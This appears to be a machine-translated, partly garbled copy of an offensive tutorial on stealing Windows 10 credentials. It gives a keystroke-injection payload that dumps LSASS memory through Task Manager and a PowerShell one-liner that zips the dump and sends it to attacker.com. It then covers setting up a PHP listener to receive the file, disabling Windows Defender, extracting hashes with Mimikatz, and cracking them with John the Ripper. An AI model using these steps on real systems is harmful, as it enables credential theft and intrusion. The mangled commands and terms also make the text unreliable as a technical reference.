Windows 10 passwords stored as NTLM hashes (or more accurately, as NT hashes) can be stored in seconds and transferred to an attacker's system. The hashes can be brutally forced and cracked to reveal the passwords in plain language with a combination of tools, including Mimikatz, ProcDump, John the Ripper, and Hashcat.
Before We Talk About Local The Security Authority Subsystem Service (LSASS) is an integral part of the Windows operating system.
LSASS is responsible for authoritative domain authentication, Active Directory administration, and security policy enforcement. It generates the processes responsible for authenticating users with NTML and verifies the validity of logins. Because this is critical to the functionality of the operating system, hackers often rename malicious executables after the process.
Windows Defender and antivirus software can more effectively detect mimic set executions and signatures (see below).
In combination with Mimikatz, hackers now use ProcDump, a stand-alone executable designed for administrators to monitor application crashes.
ProcDump is used to extract the LSASS dump, which is later moved to a Windows 10 offline computer and parsed with Mimikatz. This is still an effective way to extract credentials from Windows 10 because ProcDump is a signed Microsoft binary file and is not selected by most anti-virus programs (see below) ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>
The Windows 10 Task Manager can also be used to save the LSASS memory without the help of Mimikatz or ProcDump. The following is an example of a mousejack payload designed to extract and filter the LSASS dump with only exploits by keystroke injection and PowerShell. The attack is completed in less than ten seconds (for interpretation, it was slowed down in certain places).
The Task Manager will open in the Run window with Administrator privileges. The screen goes blank for one second due to the User Access Control (UAC) prompt, which prevents the GIF creator from recording the screen. The local security authority process (lsass.exe) is then in the list of processes and is stored (by default) in the% TEMP% directory. A PowerShell one-liners will then be executed completely through the execution window. The LSASS dump is compressed into a ZIP file and sent to the attacker's server.
At this point, the attacker can use mimic kit on an offline Windows 10 computer or a virtual machine (on which antivirus software is not installed) to extract hashing of passwords.
While MouseJack vulnerabilities became known a few years ago, ten of millions of keyboards and mice (including Logitech devices) still feared keypress injection . As Marcus Mengs, creator of P4wnP1 in his proof-of-concept video demonstrates, Logitech dongles are still vulnerable to remote attacks.
Comments ( REM ) For clarity, a 2.5 second delay was added to each line in the payload
REM mount the USB Rubber Ducky. This initial delay is not
REM required for mousejack attacks.
REM Opens the execution command window.
REM The execution command window opens for 1 second.
REM Enter "taskmgr" (ie Task Manager) in the execution window.
REM delay for 0.5 seconds.
REM Ctrl + Shift + Enter key combination is pressed to enter
Go to the User Account Control (UAC) window. This will lead to it
REM taskmgr to open with administrator rights.
CTRL + SHIFT ENTER
Allow REM popup of the UAC window. This may take a few seconds
REM on some Windows 10 computers.
REM ALT + y Keyboard shortcut for accepting and bypassing user account control
REM command prompt.
REM Wait a few seconds for Task Manager to open completely
REM administrator rights. This took me (on average) 5.5 seconds in my
SEM tests. In some scenarios with high-end CPUs, this delay occurs
REM can be significantly lower.
REM Press the keyboard down to move from the toolbar to
REM list of active background processes.
REM Enter "local" to jump down and highlight "Local Security"
REM Authority Service ".
The shortcut REM SHIFT + F10 invokes the right-click options
SHIFT key F10
REM The options menu opens completely after 1.2 seconds.
REM Press the keyboard four times to highlight Create
"REM dump file."
REM Press Enter to select Create Dump File.
REM Wait 3.5 seconds for the backup file to create and save itself
REM in the% TEMP% directory.
REM Press Enter to select "OK" and close the dump popup window.
REM ALT + F4 combination to close the Task Manager window.
REM Wait 0.7 seconds for Task Manager to close.
REM Reopen the execution command window.
REM Wait 0.7 seconds for the execution window to open.
REM PowerShell One-Liner for compressing and exfiltrating the LSASS
REM dump file. Every part of the one-liners is explained in greater
REM detail below.
STRING powershell -ep bypass / w 1 / C $ t = $ env: temp; $ l = & # 39; lsass.DMP & # 39 ;; compress-archive path $ t $ l-destination path $ t a.zip; iwr attacker.com /i.php method POST -Infile $ t a.zip
REM Press Enter to run the PowerShell one-liners.
The PowerShell payload consists of several commands concatenated by semicolons:
powershell -ep bypass / w 1 / C – The ExecutionPolicy (-ep) is set to "bypass" to Running PowerShell over Windows allows Defender and some antivirus software. The WindowStyle (/ w) is set to "1", which immediately hides the PowerShell popup terminal.
$ t = $ env: temp; – The temporary directory of the target is set to $ t. Using single-letter variables helps to shorten the overall payload length. This is more effective than typing "C: Users % USERNAME% AppData Local Temp" over and over again.
$ l = & # 39; lsass.DMP & # 39 ;; – The lsass.DMP filename is set to the $ l variable. This file name is defined automatically by Task Manager.
Compress archive path $ t $ l target path $ t a.zip; – The Compact Compact PowerShell cmdlet is used to compress the lsass.DMP (-path) to the a.zip (-destinationpath) file.
iwr attacker.com/i.php method POST -infile $ t a.zip – Invoke web request (iwr) sends the a.zip (-infile) to the server as a POST request the attacker. Make sure that "attacker.com" is changed to Kali's local IP address or virtual private server address.
Step 2: Intercepting the LSASS Dump
Before you perform a keyboard input, a PHP server is required to intercept the exfiltrated dump.
The keystroke payload expects a server on port 80. In this example, Kali Linux is used on a local network for simplicity, so root privileges are already in use. However, setting up on a virtual private server requires root to open a monitoring service on port 80.
Non-Kali users can start with the following command.
~ $ sudo su
Then create a directory named "phpServer /" with the following command mkdir .
~ $ mkdir phpServer /
Use the cd command to change to the phpServer / directory. ~ $ cd phpServer /
Create a file named "i.php" with nano .
~ $ nano i.php
Paste the following PHP script into the nano-terminal. Once this is done, press to save and exit the Nano Terminal Ctrl + x then y and then Enter .
This simple PHP script can catch ZIP files and does not need to be modified in any way to work. When the Windows 10 target computer sends a ZIP file, this PHP server stores the data with the time as the file name.
Start the PHP server with the command php -S 0.0.0.0:80. The -S tells PHP to start a web server, while instructs 0.0.0.0 to host the server on each IPv4 interface.
~ $ php -S 0.0.0.0: 80
PHP 7.3.0-2 Development Server has been started
Listen to http://0.0.0.0:80
The document root is / root / phpServer
Press Ctrl-C to exit.
Step 3: Extract the hashes with mimic set.
After the .zip file has been intercepted, move it to a Windows 10 computer or virtual machine. Extract it to find the file lsass.DMP.
Disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "Virus".
Click "Anti-virus and threat protection settings" and deselect all available options. Alternatively, a virtual machine that does not have Windows Defender or Smartscreen installed can be configured for Mimikatz antics.
At the time of writing this document is the latest version by Mimikatz 2.2.0, Carlos update. Open a web browser and navigate to its GitHub repository to find the latest version of mimikatz_trunk.zip.
After unzipping the Mimic ZIP file, open a PowerShell terminal. Use the following command to run the mimikatz.exe file. The mimikatz prompt appears.
C: > PS & C: Users $ env: username PATH TO MIMIKATZ x64 mimikatz.exe
#####. mimicze 2.2.0 (x64) # 18362 August 13, 2019 01:35:04
, "A La Vie, a L & # 39; Amour" - (oe.eo)
## / ## / *** Benjamin DELPY `gentilkiwi` (email@example.com)
## / ##> http://blog.gentilkiwi.com/mimikatz
& # 39; ## v ## & # 39; Vincent LE TOUX (firstname.lastname@example.org)
& # 39; ##### #> http://pingcastle.com / http://mysmartlogon.com *** /
The following command sekurlsa :: minidump loads lsass.DMP into mimikatz.
Then use the command sekurlsa :: logonPasswords to extract hashed credentials. Since Windows 8, plain text passwords are no longer stored without the operating system having to be changed further. However, this does not mean that Windows 10 hashes can be brutally enforced and easily cracked. In line 12 we find the hashed password in NTLM format.
As a small experiment. I wanted to know how long a Raspberry Pi 3B +, a common Intel i7 CPU, and a GeForce GTX GPU would need to crack the same hash, which consists of six random characters and ends with two random numbers (for example: nchfyr56).
. 1 Brute Force with Raspberry Pi 3B + (John the Ripper)
~ $ john -mask =? l? l? l? l? l? d? d - format = NT / root / Desktop / hash
Use standard input encoding: UTF-8
1 password hash loaded (NT [MD4 32/32])
Warning: No OpenMP support for this hash type. Note --fork = 4
Press & # 39; q & # 39; or Ctrl-C to cancel the operation, almost every other button for the status
1 g 0: 05: 19: 24 READY (2018-06-22 16:36) 0.000052 g / s 1389 Kp / s 1389 Kc / s 1389 Kc / s achfyr56..zuhfyr56
Use the --show --format = NT options to reliably display all cracked passwords